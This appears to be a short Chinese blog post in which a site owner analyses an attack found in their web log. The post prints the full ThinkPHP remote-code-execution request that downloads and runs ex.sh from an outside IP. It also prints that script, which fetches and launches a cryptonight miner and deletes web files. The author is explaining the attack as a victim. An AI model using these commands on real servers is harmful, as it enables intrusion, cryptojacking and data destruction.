從我的 web log 擷取的資料:
205.185.113.123 - - [29/Dec/2018:21:37:59 +0800] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://205.185.113.123/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 302 388 "-" "Sefa"
利用 thinkphp 這個架站套件漏洞, 企圖下載一個 ex.sh 的程式碼再執行
下載回來ex.sh的內容:
cd /tmp; wget http://205.185.113.123/mcoin; curl http://205.185.113.123/mcoin -O; chmod 777 mcoin; ./mcoin -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=95; rm -rf RjsWscd /tmp; wget http://205.185.113.123/mcoin-ankit; curl http://205.185.113.123/mcoin-ankit -O; chmod 777 mcoin-ankit; ./mcoin-ankit -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=95; rm -rf RjsWsmv /var/www/html/index.php /var/www/html/elrekt.phprm -rf /tmp/ex.sh
將一個 mcoin 編碼過的程式下載至暫存目錄, 修改權限到最大再執行, 還會硬操CPU... 估狗了一下這個 mcoin, 一種類似比特幣的虛擬貨幣, 所以可以推論這是一個偷偷植入木馬並且綁架你的電腦當作挖礦機的東西
沒有留言:
張貼留言